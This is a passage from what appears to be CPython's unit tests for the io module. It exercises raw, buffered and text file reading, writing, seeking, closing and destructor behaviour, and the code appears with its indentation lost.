return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
self.assertRaises(ValueError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2GB file and uses >2GB of disk space,
        # so the 'largefile' resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it would end up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
